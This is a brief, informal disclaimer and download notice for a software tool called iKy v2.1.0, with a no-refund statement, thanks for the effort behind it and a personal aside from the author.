Contribute to the project. We do not refund your money if you are not satisfied. I hope you enjoy using the tool as much as we enjoy doing it. The effort was and is enormous (Time, knowledge, coding, tests, reviews, etc.) but we would do it again. Do not use the tool if you cannot read the instructions and / or this disclaimer clearly. By the way, for those who insist on remembering my mother, she died many years ago but I love her as if she were right here. Download Project iKy v2.1.0